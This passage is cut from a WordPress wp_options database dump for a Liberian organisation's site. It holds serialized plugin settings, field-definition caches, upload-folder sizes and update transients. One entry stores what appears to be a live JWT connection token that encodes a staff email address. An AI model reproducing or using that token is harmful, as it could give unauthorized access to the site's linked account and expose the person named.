:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/05\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/09\";i:11176335;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/01\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/02\";i:11403504;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/08\";i:3295970;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/06\";i:41073518;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/12\";i:21759956;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/10\";i:2444207;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/03\";i:3748780;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/04\";i:0;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2020/07\";i:10975238;s:49:\"/home/ekmslib/public_html/wp-content/uploads/2020\";i:120527015;s:53:\"/home/ekmslib/public_html/wp-content/uploads/evf-logs\";i:13;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/11\";i:1539314;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/05\";i:5275314;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/09\";i:148488462;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/01\";i:38983998;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/02\";i:5919218;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/08\";i:26787720;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/06\";i:14779596;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/12\";i:22350736;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/10\";i:4991746;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/03\";i:24077177;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/04\";i:4175937;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2021/07\";i:8617344;s:49:\"/home/ekmslib/public_html/wp-content/uploads/2021\";i:305986562;s:58:\"/home/ekmslib/public_html/wp-content/uploads/elementor/css\";i:78429;s:61:\"/home/ekmslib/public_html/wp-content/uploads/elementor/thumbs\";i:2805500;s:66:\"/home/ekmslib/public_html/wp-content/uploads/elementor/screenshots\";i:13356;s:54:\"/home/ekmslib/public_html/wp-content/uploads/elementor\";i:2897285;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2026/01\";i:15201733;s:52:\"/home/ekmslib/public_html/wp-content/uploads/2026/02\";i:11450304;s:49:\"/home/ekmslib/public_html/wp-content/uploads/2026\";i:26652037;s:44:\"/home/ekmslib/public_html/wp-content/uploads\";i:1169296108;}','off'),(5635415,'_transient_timeout_pods_72185e4e32463e4cc81597af1f103438','1782403632','off'),(5635416,'_transient_pods_72185e4e32463e4cc81597af1f103438','a:26:{s:2:\"ID\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:2:\"ID\";s:5:\"label\";s:2:\"ID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:1:{i:0;s:2:\"id\";}s:20:\"hide_in_default_form\";b:1;}s:10:\"post_title\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"post_title\";s:5:\"label\";s:5:\"Title\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:2:{s:14:\"display_filter\";s:9:\"the_title\";s:19:\"display_filter_args\";a:1:{i:0;s:7:\"post_ID\";}}s:5:\"alias\";a:2:{i:0;s:5:\"title\";i:1;s:4:\"name\";}}s:12:\"post_content\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_content\";s:5:\"label\";s:7:\"Content\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"wysiwyg\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:25:\"wysiwyg_allowed_html_tags\";s:0:\"\";s:21:\"wysiwyg_media_buttons\";i:1;s:14:\"display_filter\";s:11:\"the_content\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"content\";}}s:12:\"post_excerpt\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:12:\"post_excerpt\";s:5:\"label\";s:7:\"Excerpt\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:20:\"paragraph_allow_html\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";s:14:\"display_filter\";s:11:\"the_excerpt\";s:8:\"pre_save\";i:0;}s:5:\"alias\";a:1:{i:0;s:7:\"excerpt\";}}s:11:\"post_author\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_author\";s:5:\"label\";s:6:\"Author\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:4:{s:16:\"pick_format_type\";s:6:\"single\";s:18:\"pick_format_single\";s:12:\"autocomplete\";s:13:\"default_value\";s:10:\"{@user.ID}\";s:21:\"default_evaluate_tags\";i:1;}s:5:\"alias\";a:1:{i:0;s:6:\"author\";}s:11:\"pick_object\";s:4:\"user\";s:8:\"pick_val\";s:4:\"user\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";}s:9:\"post_date\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_date\";s:5:\"label\";s:12:\"Publish Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:7:\"created\";i:1;s:4:\"date\";}}s:13:\"post_date_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_date_gmt\";s:5:\"label\";s:18:\"Publish Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_status\";s:5:\"label\";s:6:\"Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:5:\"draft\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:11:\"post-status\";s:18:\"pick_format_single\";s:8:\"dropdown\";s:5:\"alias\";a:1:{i:0;s:6:\"status\";}}s:14:\"comment_status\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"comment_status\";s:5:\"label\";s:14:\"Comment Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}}s:11:\"ping_status\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"ping_status\";s:5:\"label\";s:11:\"Ping Status\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";s:4:\"open\";s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:4:\"data\";a:2:{s:4:\"open\";s:4:\"Open\";s:6:\"closed\";s:6:\"Closed\";}s:20:\"hide_in_default_form\";b:1;}s:13:\"post_password\";a:21:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_password\";s:5:\"label\";s:8:\"Password\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"password\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:20:\"hide_in_default_form\";b:1;}s:9:\"post_name\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_name\";s:5:\"label\";s:9:\"Permalink\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"slug\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:2:{i:0;s:4:\"slug\";i:1;s:9:\"permalink\";}}s:7:\"to_ping\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:7:\"to_ping\";s:5:\"label\";s:7:\"To Ping\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:6:\"pinged\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:6:\"pinged\";s:5:\"label\";s:6:\"Pinged\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"post_modified\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"post_modified\";s:5:\"label\";s:18:\"Last Modified Date\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:8:\"modified\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:17:\"post_modified_gmt\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:17:\"post_modified_gmt\";s:5:\"label\";s:24:\"Last Modified Date (GMT)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"datetime\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:21:\"post_content_filtered\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"post_content_filtered\";s:5:\"label\";s:18:\"Content (filtered)\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:9:\"paragraph\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:7:{s:20:\"paragraph_allow_html\";i:1;s:16:\"paragraph_oembed\";i:1;s:21:\"paragraph_wptexturize\";i:1;s:23:\"paragraph_convert_chars\";i:1;s:17:\"paragraph_wpautop\";i:1;s:25:\"paragraph_allow_shortcode\";i:1;s:27:\"paragraph_allowed_html_tags\";s:0:\"\";}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:11:\"post_parent\";a:26:{s:2:\"id\";i:0;s:4:\"name\";s:11:\"post_parent\";s:5:\"label\";s:6:\"Parent\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"pick\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:11:\"pick_object\";s:9:\"post_type\";s:8:\"pick_val\";s:11:\"__current__\";s:17:\"pick_data_storage\";s:6:\"object\";s:11:\"pick_output\";s:3:\"ids\";s:5:\"alias\";a:1:{i:0;s:6:\"parent\";}s:4:\"data\";a:0:{}s:6:\"hidden\";b:1;}s:4:\"guid\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:4:\"guid\";s:5:\"label\";s:4:\"GUID\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:10:\"menu_order\";a:20:{s:2:\"id\";i:0;s:4:\"name\";s:10:\"menu_order\";s:5:\"label\";s:10:\"Menu Order\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:13:\"number_format\";s:7:\"9999.99\";}s:5:\"alias\";a:0:{}}s:9:\"post_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:9:\"post_type\";s:5:\"label\";s:4:\"Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:1:{i:0;s:4:\"type\";}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:14:\"post_mime_type\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:14:\"post_mime_type\";s:5:\"label\";s:9:\"Mime Type\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"comment_count\";a:22:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"comment_count\";s:5:\"label\";s:13:\"Comment Count\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:6:\"number\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:8:\"comments\";a:24:{s:2:\"id\";i:0;s:4:\"name\";s:8:\"comments\";s:5:\"label\";s:8:\"Comments\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:7:\"comment\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:19:\"comment_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:7:\"comment\";s:8:\"pick_val\";s:7:\"comment\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;s:20:\"hide_in_default_form\";b:1;}s:13:\"_thumbnail_id\";a:23:{s:2:\"id\";i:0;s:4:\"name\";s:13:\"_thumbnail_id\";s:5:\"label\";s:14:\"Featured Image\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:4:\"file\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:0:{}s:16:\"file_format_type\";s:6:\"single\";s:9:\"file_type\";s:10:\"images-any\";s:15:\"file_edit_title\";i:0;s:5:\"alias\";a:0:{}}s:21:\"institutions_category\";a:25:{s:2:\"id\";i:0;s:4:\"name\";s:21:\"institutions_category\";s:5:\"label\";s:23:\"Institutions Categories\";s:11:\"description\";s:0:\"\";s:4:\"help\";s:0:\"\";s:7:\"default\";N;s:10:\"attributes\";a:0:{}s:5:\"class\";s:0:\"\";s:4:\"type\";s:8:\"taxonomy\";s:5:\"group\";i:0;s:7:\"grouped\";i:0;s:14:\"developer_mode\";b:0;s:10:\"dependency\";b:0;s:10:\"depends-on\";a:0:{}s:14:\"depends-on-any\";a:0:{}s:16:\"depends-on-multi\";a:0:{}s:11:\"excludes-on\";a:0:{}s:11:\"wildcard-on\";a:0:{}s:7:\"options\";a:1:{s:20:\"taxonomy_format_type\";s:5:\"multi\";}s:11:\"pick_object\";s:8:\"taxonomy\";s:8:\"pick_val\";s:21:\"institutions_category\";s:15:\"taxonomy_object\";s:8:\"taxonomy\";s:12:\"taxonomy_val\";s:21:\"institutions_category\";s:5:\"alias\";a:0:{}s:6:\"hidden\";b:1;}}','off'),(5597812,'bit_social_pro_895c8b07848f27db4d03e4618250e75a','a:2:{s:7:\"timeout\";i:1781068307;s:5:\"value\";O:8:\"stdClass\":8:{s:7:\"version\";s:7:\"1.13.10\";s:9:\"requireWP\";s:3:\"5.1\";s:10:\"requirePHP\";s:3:\"7.4\";s:6:\"tested\";s:5:\"6.9.1\";s:7:\"details\";s:119:\"It allows users to easily schedule and automatically share their WordPress website posts on 12+ social media platforms.\";s:9:\"updatedAt\";s:19:\"2026-05-07 10:24:45\";s:8:\"sections\";a:2:{s:11:\"description\";s:119:\"It allows users to easily schedule and automatically share their WordPress website posts on 12+ social media platforms.\";s:9:\"changelog\";s:0:\"\";}s:12:\"downloadLink\";s:60:\"https://wp-api.bitapps.pro/download/6a1b30ff1e65fe0df17e527b\";}}','off'),(5597815,'bit_social_pro_4e5ed95066013e9545216f1f6c62e087','a:2:{s:7:\"timeout\";i:1781068308;s:5:\"value\";O:8:\"stdClass\":8:{s:7:\"version\";s:7:\"1.13.10\";s:9:\"requireWP\";s:3:\"5.1\";s:10:\"requirePHP\";s:3:\"7.4\";s:6:\"tested\";s:5:\"6.9.1\";s:7:\"details\";s:119:\"It allows users to easily schedule and automatically share their WordPress website posts on 12+ social media platforms.\";s:9:\"updatedAt\";s:19:\"2026-05-07 10:24:45\";s:8:\"sections\";a:2:{s:11:\"description\";s:119:\"It allows users to easily schedule and automatically share their WordPress website posts on 12+ social media platforms.\";s:9:\"changelog\";s:0:\"\";}s:12:\"downloadLink\";s:60:\"https://wp-api.bitapps.pro/download/6a1b30ff1e65fe0df17e527b\";}}','on'),(5303712,'bz_contact_button_account','a:8:{s:4:\"name\";s:12:\"EKMS LIBERIA\";s:3:\"uid\";i:141198;s:13:\"site_licensed\";b:0;s:7:\"site_id\";i:9163321;s:13:\"site_timezone\";s:13:\"Europe/London\";s:9:\"plan_name\";s:4:\"Free\";s:7:\"plan_id\";N;s:14:\"plan_cancelled\";b:0;}','auto'),(5303710,'bz_contact_button_site_connection','eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpYXQiOjE3NzA5NDQzMjYsInRva2VuIjoiYTNjMmUzM2U1NDhjNzUzMzYwNzJiNzMzNGNjZTg3ZTciLCJ1aWQiOjE0MTE5OCwic2lkIjo5MTYzMzIxLCJlbWFpbCI6InZhaHVqYXlAZXBhLmdvdi5sciIsImV4cCI6MTc5NTA0OTkyNiwiaXNzIjoiZXh0ZXJuYWwudG9rZW5zLmJ1dHRvbml6ZXIuaW8ifQ.sf6NvaG6Gqzmoqwf_AtTZ0YQn9eN7G5SYhTcjGR_Eyk','auto'),(5303711,'bz_contact_button_settings','a:7:{s:16:\"token_expiration\";O:8:\"DateTime\":3:{s:4:\"date\";s:26:\"2026-07-13 00:58:46.125598\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:14:\"finished_setup\";b:1;s:12:\"installed_at\";O:8:\"DateTime\":3:{s:4:\"date\";s:26:\"2026-02-13 00:58:46.126486\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:14:\"last_synced_at\";O:8:\"DateTime\":3:{s:4:\"date\";s:26:\"2026-02-13 00:58:46.126488\";s:13:\"timezone_type\";i:3;s:8:\"timezone\";s:3:\"UTC\";}s:7:\"site_id\";s:36:\"907cc2e6-349c-4100-adf1-b9a28f470bf9\";s:17:\"include_page_data\";b:0;s:21:\"review_marked_as_done\";b:1;}','auto'),(5367675,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:2:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-7.0.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-7.0.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-7.0-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-7.0-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:3:\"7.0\";s:7:\"version\";s:3:\"7.0\";s:11:\"php_version\";s:3:\"7.4\";s:13:\"mysql_version\";s:5:\"5.5.5\";s:11:\"new_bundled\";s:3:\"6.7\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:49:\"https://downloads.w.org/release/wordpress-7.0.zi